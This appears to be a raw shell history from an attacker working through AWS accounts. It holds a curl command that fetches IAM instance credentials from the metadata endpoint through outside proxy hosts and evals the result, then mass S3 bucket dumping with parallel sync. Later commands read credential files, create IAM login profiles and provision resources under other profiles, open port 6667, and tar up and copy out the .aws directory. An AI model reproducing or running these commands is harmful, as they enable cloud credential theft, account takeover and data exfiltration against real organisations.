http://54.173.72.185:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials,
               | awssession.sh`\n
 8650  aws ec2 describe-instances --region us-west-2
 8651  aws s3api list-buckets
 8653  eval `curl --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy
https://18.195.126.53:443
http://169.254.169.254/latest/meta-data/iam/security-credentials,
               | awssession.sh`\n
 8654  aws        get-caller-identity
 8655  aws s3api list-buckets
 8656  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='              ' \;
mkdir -p \"${dir\}\" '&&' cd \"${dir\}\" '&&' aws s3 sync s3://{} .
 8704  cd aws
 8705  cd aws_dumps
 8782  less
 8820  mv .aws.bak .aws
 8821  cat .aws/credentials
 8822  aws --profile          describe-instances --region us-east-1
 8823  aws --profile       describe-instances --region us-east-1
```

```
8824  aws --profile            describe-instances --region us-east-1
8825  aws --profile                  :ribe-instances --region us-east-1
8826  aws --profile                  create-hosted-zone --name paigeat.info
8827  aws --profile                  create-hosted-zone --name paigeat.info --caller-reference
PAIGEATINFO
8828  aws --profile            list-buckets
8829  aws --profile            create-bucket --bucket default
8830  aws --profile            create-bucket --bucket _
8831  aws --profile            create-bucket --bucket paigeat.info
8832  aws --profile            create-bucket --bucket paigeatinfo
8834  aws --profile            put-bucket-policy --bucket paigeatinfo --policy
file:///paigeat.policy
8835  aws --profile            put-bucket-policy --bucket paigeatinfo --policy
file:///home/erratic/paigeat.policy
8840  aws --profile            create-distribution --origin-domain-name
paigeatinfo.s3.amazonaws.com --distribution-config
file:///home/erratic/paigeat.info/cloudfrontdistribution.config
8841  aws --profile                  create-distribution --distribution-config
file:///home/erratic/paigeat.info/cloudfrontdistribution.config
8842  aws --profile       change-resource-record-sets --hosted-zone-id        UDST --change-batch
paigeat.bucket_alias
8843  aws --profile                  change-resource-record-sets --hosted-zone-id        JDST
--change-batch paigeat.bucket_alias
8844  aws --profile                  change-resource-record-sets --change-batch
file://paigeat.bucket_alias
8845  aws --profile            list-hosted-zones
8847  aws --profile                  change-resource-record-sets --generate-cli-skeleton
8849  aws --profile                  change-resource-record-sets --hosted-zone-id        UDST
--change-batch file://paigeat.bucket_alias
9090  aws --profile                  list-distributions
9091  aws
9092  aws iam create-login-profile --generate-cli-skeleton > create-login-profile.json
9094  aws --profile            create-login-profile --cli-input-json file://create-login-profile.json
9095  aws --profile            get-caller-identity
9101  git submodule add https://github.com/paigeadelethompson/aws-lambda-blog.git
9106  aws --profile                  view-billing
9107  aws --profile                  view-billing --region us-east-1
9108  aws --profile                  list-operations
9109  aws --profile                  describe-organization
```

```
9153  cp ../aws_scan/spool.sh .
9182  aws --profile                    list-operations --region us-east-1
9217  aws --profile                  create-customer-gateway --help
9218  seq 2 254 | xargs -i -t aws --profile                  create-customer-gateway --public-ip
46.246.43.{} --type static
9219  seq 2 254 | xargs -i -t aws --profile             create-customer-gateway --public-ip
46.246.43.{} --type static --bgp-asn 65000
9220  seq 2 254 | xargs -i -t aws --profile             create-customer-gateway --public-ip
46.246.43.{} --type static --bgp-asn 65000 --region eu-north-1
9221  seq 2 254 | xargs -i -t aws --profile             create-customer-gateway --public-ip
46.246.43.{} --type ipsec.1 --bgp-asn 65000 --region eu-north-1
9222  aws --profile                  describe-customer-gateways --region eu-north-1
9223  aws --profile                  describe-customer-gateways --region eu-north-1 | jq '.CustomerGateways
|.[]'
9224  aws --profile                  describe-customer-gateways --region eu-north-1 | jq -r
'.CustomerGateways |.[] | .CustomerGatewayId'
9225  aws --profile                  describe-customer-gateways --region eu-north-1 | jq -r
'.CustomerGateways |.[] | .CustomerGatewayId' | parallel  aws --profile
delete-customer-gateway --gateway-id {}  --region eu-north-1
9226  aws --profile                  describe-customer-gateways --region eu-north-1 | jq -r
'.CustomerGateways |.[] | .CustomerGatewayId' | parallel  aws --profile
delete-customer-gateway --customer-gateway-id {}  --region eu-north-1
9227  aws --profile             create-customer-gateway --public-ip 46.246.43.83 --type ipsec.1
--bgp-asn 65000 --region eu-north-1
9228  aws --profile             create-customer-gateway --public-ip 46.246.43.50 --type ipsec.1
--bgp-asn 65000 --region eu-north-1
9229  aws --profile             reate-customer-gateway --public-ip 46.246.43.15 --type ipsec.1
--bgp-asn 65000 --region eu-north-1
9294  aws --profile             sync s3://         7507/default .
9295  cat ~/.aws/config
9296  cat ~/.aws/credentials
9297  aws --profile          iam create-login-profile --cli-input-json file://create-login-profile.json
9298  aws     get-caller-identity --profile
9561  aws --profile             authorize-security-group-ingress --group-id sg-     10cb --protocol tcp
--port 6667 --cidr 172.0.0.0/8 --region eu-north-1
9965  cd aws_scan
9966  scp new_all.xz admin2-1:/dev/shm/aws/new_all.xz
10005 tar -cvf aws.tar .aws
10007 history | grep aws
```